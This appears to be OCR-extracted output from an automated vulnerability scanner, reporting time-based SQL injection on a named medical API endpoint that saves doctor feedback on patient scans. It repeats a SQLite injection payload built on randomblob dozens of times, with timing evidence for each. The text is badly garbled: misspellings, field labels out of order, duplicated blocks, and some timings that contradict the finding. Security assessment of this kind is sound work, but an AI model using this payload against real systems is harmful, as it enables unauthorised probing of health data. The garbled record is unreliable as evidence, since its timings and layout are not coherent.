The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,033] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,158] milliseconds, when the original unmodified query with value [456] took [260] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,062] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,518] milliseconds, when the original unmodified query with value [334]

took [809] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,062] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,518] milliseconds, when the original unmodified query with value [334] took [809] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback **URL**

Method **POST**

Evidence

Other

Info

URL

Evidence

Other Info

URL

Evidence

Other Info

URL

Evidence

Other

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,197] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,006] milliseconds, when the original unmodified query with value [336]

took [1,346] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,197] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,006] milliseconds, when the original unmodified query with value [336]

took [1,346] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,201] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,459] milliseconds, when the original unmodified query with value [97] took

[1,944] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,201] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,459] milliseconds, when the original unmodified query with value [97] took

[1,944] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,260] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,895] milliseconds, when the original unmodified query with value [270]

took [943] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,260] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,895] milliseconds, when the original unmodified query with value [270]

took [943] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,268] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,978] milliseconds, when the original unmodified query with value [744]

took [779] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,268] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,978] milliseconds, when the original unmodified query with value [744]

took [779] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(100000) when not null then 1 else 1 end

Other Info

Evidence

Method

Attack

Evidence

Other

Info

Attack

Evidence

Other Info

Attack

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,270] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,588] milliseconds, when the original unmodified query with value [170] took [779] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,270] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,588] milliseconds, when the original unmodified query with value [170] took [779] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,291] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,465] milliseconds, when the original unmodified query with value [493] took [1,738] milliseconds.

--

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,291] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,465] milliseconds, when the original unmodified query with value [493] took [1,738] milliseconds.

Other Info

URL

Evidence

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,315] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,789] milliseconds, when the original unmodified query with value [514]

took [1,126] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,315] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,789] milliseconds, when the original unmodified query with value [514] took [1,126] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,366] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,584] milliseconds, when the original unmodified query with value [244]

took [811] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,366] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,584] milliseconds, when the original unmodified query with value [244] took [811] milliseconds.

took [o i i] illillisecolius.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,377] milliseconds, parameter

Evidence

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,706] milliseconds, when the original unmodified query with value [156] took [797] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,377] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,706] milliseconds, when the original unmodified query with value [156] took [797] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,405] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,533] milliseconds, when the original unmodified query with value [561]

took [1,504] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,405] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,533] milliseconds, when the original unmodified query with value [561] took [1,504] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,477] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,725] milliseconds, when the original unmodified query with value [195] took [1,849] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,477] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,725] milliseconds, when the original unmodified query with value [195] took [1,849] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,506] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,711] milliseconds, when the original unmodified query with value [254] took [1,578] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,506] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,711] milliseconds, when the original unmodified query with value [254] took [1,578] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,777] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,220] milliseconds, when the original unmodified query with value [864] took [964] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,777] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,220] milliseconds, when the original unmodified query with value [864] took [964] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,789] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,216] milliseconds, when the original unmodified guery with value [34] took

[1,818] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,789] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,216] milliseconds, when the original unmodified query with value [34] took

[1,818] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,812] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,964] milliseconds, when the original unmodified query with value

[680.1882352941176] took [1,437] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,812] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,964] milliseconds, when the original unmodified query with value

[680.1882352941176] took [1,437] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,903] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,785] milliseconds, when the original unmodified query with value [329]

took [1,601] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,903] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,785] milliseconds, when the original unmodified query with value [329]

took [1,601] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [258] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [262] milliseconds, when the original unmodified query with value [480] took

[256] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [258] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

request to take [262] milliseconds, when the original unmodified query with value [480] took

[256] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

Method **POST**

Other Info

Evidence

Method

Attack

Evidence

Other Info

Evidence

Other

Info

Evidence

Other

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,017] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,269] milliseconds, when the original unmodified query with value [234]

took [2,337] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,017] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,269] milliseconds, when the original unmodified query with value [234]

took [2,337] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,233] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [7,564] milliseconds, when the original unmodified query with value [605]

took [1,246] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,233] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [7,564] milliseconds, when the original unmodified guery with value [605]

took [1,246] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,382] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,230] milliseconds, when the original unmodified query with value [500]

took [1,352] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,382] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,230] milliseconds, when the original unmodified query with value [500]

took [1,352] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,793] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,987] milliseconds, when the original unmodified query with value [427]

took [262] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,793] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,987] milliseconds, when the original unmodified query with value [427]

took [262] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Evidence

Evidence

Other

Info

Other

Info

Attack

Evidence

Other Info

Evidence

Other Info

URL

Method **POST**

Evidence

Other

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,132] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,202] milliseconds, when the original unmodified query with value [189]

took [866] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,132] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,202] milliseconds, when the original unmodified query with value [189]

took [866] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,165] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,644] milliseconds, when the original unmodified query with value [202]

took [773] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,165] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,644] milliseconds, when the original unmodified query with value [202]

took [773] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,277] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [7,110] milliseconds, when the original unmodified query with value [327]

took [1,538] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,277] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [7,110] milliseconds, when the original unmodified query with value [327]

took [1,538] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,306] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,426] milliseconds, when the original unmodified query with value [290]

took [1,956] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,306] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,426] milliseconds, when the original unmodified query with value [290]

took [1,956] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

Other

Evidence

Info

Evidence

Other Info

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,949] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,886] milliseconds, when the original unmodified query with value [0] took [1,468] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,949] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,886] milliseconds, when the original unmodified query with value [0] took [1,468] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [550] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [784] milliseconds, when the original unmodified query with value [361] took [266] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [550] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [784] milliseconds, when the original unmodified query with value [361] took [266] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [765] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,228] milliseconds, when the original unmodified query with value [846] took [258] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [765] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,228] milliseconds, when the original unmodified query with value [846] took [258] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [775] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,329] milliseconds, when the original unmodified query with value [158] took [771] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [775] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,329] milliseconds, when the original unmodified query with value [158] took [771] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [795] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

request to take [2,006] milliseconds, when the original unmodified guery with value [688]

took [786] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [795] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,006] milliseconds, when the original unmodified query with value [688] took [786] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [796] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,384] milliseconds, when the original unmodified guery with value

[725.9921568627451] took [256] milliseconds.

Other Info

Evidence

Other

Info

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [796] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,384] milliseconds, when the original unmodified query with value [725.9921568627451] took [256] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [815] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,980] milliseconds, when the original unmodified query with value [861]

took [764] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [815] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,980] milliseconds, when the original unmodified query with value [861] took [764] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [880] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,921] milliseconds, when the original unmodified query with value [727]

took [534] milliseconds.

Other Info

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [880] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,921] milliseconds, when the original unmodified query with value [727] took [534] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [950] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,351] milliseconds, when the original unmodified query with value [295] took [873] milliseconds.

> The query time is controllable using parameter value [case randomblob(100000) when not

URL

Other Info

null then 1 else 1 end], which caused the request to take [950] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,351] milliseconds, when the original unmodified query with value [295]

took [873] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,028] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,843] milliseconds, when the original unmodified query with value [380] took

[2,230] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,028] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,843] milliseconds, when the original unmodified query with value [380] took [2,230] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,035] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,721] milliseconds, when the original unmodified query with value [431] took

[927] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,035] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,721] milliseconds, when the original unmodified query with value [431] took [927] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,047] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,370] milliseconds, when the original unmodified query with value [1472] took [1,247] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,047] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,370] milliseconds, when the original unmodified query with value [1472] took [1,247] milliseconds.

Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,087] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,322] milliseconds, when the original unmodified query with value [307] took

[2,815] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,087] milliseconds, parameter

Other

value [case randomblob(10000000) when not null then 1 else 1 end], which caused the Info

request to take [1,322] milliseconds, when the original unmodified query with value [307]

took [2,815] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,139] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,585] milliseconds, when the original unmodified query with value [226] took

[2,020] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,139] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,585] milliseconds, when the original unmodified query with value [226] took

[2,020] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,170] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,277] milliseconds, when the original unmodified query with value [336] took

[888] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,170] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,277] milliseconds, when the original unmodified query with value [336] took

[888] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,247] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,753] milliseconds, when the original unmodified query with value [1506]

took [1,123] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,247] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,753] milliseconds, when the original unmodified query with value [1506]

took [1,123] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,286] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,547] milliseconds, when the original unmodified query with value [312] took

[1,881] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,286] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,547] milliseconds, when the original unmodified query with value [312] took

[1,881] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

Method **POST** Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,308] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,549] milliseconds, when the original unmodified query with value [236] took

[1,899] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,308] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,549] milliseconds, when the original unmodified query with value [236] took

[1,899] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,314] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,068] milliseconds, when the original unmodified query with value [344] took

[1,605] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,314] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,068] milliseconds, when the original unmodified query with value [344] took

[1,605] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,324] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,032] milliseconds, when the original unmodified query with value [700] took

[2,318] milliseconds.

